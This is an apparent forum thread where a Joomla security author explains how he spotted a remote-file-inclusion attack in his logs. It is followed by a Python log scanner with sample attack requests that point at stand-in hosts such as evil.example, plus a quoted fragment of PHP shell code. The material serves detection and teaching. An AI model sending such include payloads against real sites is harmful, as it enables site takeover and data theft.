What's your cool hacker name? 10 Months, 4 Weeks ago
Hi there,
Tom Canavan here, Mike asked me to share a few thoughts on security. He mentioned that in your meeting today security was a bit of interest.
I'm currently writing a book, Practical Joomla! security, so you guys get to be privy to a bit of advanced knowledge! This posting is to show you how to observe being observed. In other words, how an attacker is sizing you up.
Why did I start this post out with "What's your cool hacker name?" I chose that title to open the topic of reviewing your log files for potential attack, because the underground community (as we do in the overground) likes to have online handles. Yet, having a cool name in the underground can earn you 'cred' when you "owndz" a box. Slang for penetrate, take over and make it yours.
I thought that I would share with you an example of an attempted enumeration/penetration.
Let's pull one out here from one of my websites - An actual example (sanitized of course).
This is very recent information. Let's begin by logging in and reviewing our logs. For this I use BS Squared, a wonderful extension that tracks several items about my visitors.
What this tells me is that the site web.*******.at (somewhere in South America) has been 'penetrated'.
This means that under the com_chronocontact component directory, someone has planted a shell and is controlling this site. I see that by the test.txt??? at the end.
The TEST.TXT??? is the payload of the attack. That is what the lamer is attempting to use on my site.
What in essence they are trying to do is use this remote 'command' to 'order' my site to divulge information.
We'll cover the specifics in a moment. My next item of interest is "where" this would-be lamer is hailing from. I look up the IP and find: IP Address: 201.34.32.66
Easy - Brazil Telecom. Doing a tracert on the IP would only validate the fact the attack originated from Brazil, but would likely not lead me further.
But to be sure I open a cmd prompt (Dos prompt for those over 40) and do a tracert: Here are the results:
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
tracert 201.34.32.66
Tracing route to 201-34-32-66.pvoce301.ipd.brasiltelecom.net.br [201.34.32.66] over a maximum of 30 hops:
This confirms it. Brazil. As we dig into the code we find these portions:
if((@eregi("uid",ex(id)) || (@eregi(Windows;,ex(net start; and ini_restore("safe_mode"; ini_restore("open_basedir"; )
These portions tell me that the attacker is attempting to do a 'net start' on my Windows box.
Pity I am running Linux.
Further, as we see in that code, he attempts to manipulate some settings. In a nutshell he is trying to learn what my site is running to plan an attack.
How can we defend against this? Defense In Depth - making sure we have the correct permissions, strong .htaccess settings and stay on top of security.
Read hacker forums such as milw0rm.com for potential attacks and guard against them. In this we were in no way threatened, only annoyed. So what's my cool hacker name? - You'll have to visit the hacker forums and find out!
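The log review described in the post, as an added example (not Tom's code, nor BS Squared): a small Python script that scans Apache-style access-log lines for requests whose query parameters carry a remote URL, the remote-include pattern behind the test.txt??? payload, and tallies the source IPs. The log lines, hostnames and parameter names are constructed; only the com_chronocontact path and the 201.34.32.66 address echo the post.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Constructed sample access-log lines (Apache combined format). The component
# path and the source address mirror the post; everything else is made up.
SAMPLE_LOG = """\
201.34.32.66 - - [12/Mar/2008:03:14:07 +0000] "GET /components/com_chronocontact/index.php?path=http://evil.example/test.txt??? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.5 - - [12/Mar/2008:03:15:01 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
201.34.32.66 - - [12/Mar/2008:03:16:22 +0000] "GET /index.php?config=ftp://203.0.113.9/test.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, URL, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# A parameter value that is itself a URL on another host is the classic
# remote-file-inclusion signature. The trailing "?" or "???" is there so the
# victim's include() treats the rest of its own path as a query string.
REMOTE_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def rfi_hits(log_text):
    """Return (ip, url, param, remote_url) for every request whose query string
    carries a remote URL in any parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlparse(m.group('url')).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                hits.append((m.group('ip'), m.group('url'), name, value))
    return hits


def sources(hits):
    """Count suspicious requests per source IP, the first thing to look up."""
    counts = {}
    for ip, _url, _param, _remote in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    found = rfi_hits(SAMPLE_LOG)
    for ip, url, param, remote in found:
        print(f"{ip} tried to include {remote} via parameter '{param}' in {url}")
    print("by source:", sources(found))
```

Pair the hits with a whois lookup of each source IP, as in the post, and with a check that the named component directory is still clean.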
Re:What's your cool hacker name? 10 Months, 4 Weeks ago
Be afraid. Be very afraid.
I don't have a hacker name, but I was known as "Little Arrow" in Indian Guides in 1973, and "Green Arrow" on the CB Radio whilst criss-crossing the nation in our 1972 Buick Estate Wagon - much like the Family Truckster made famous by Chevy Chase in Family Vacation.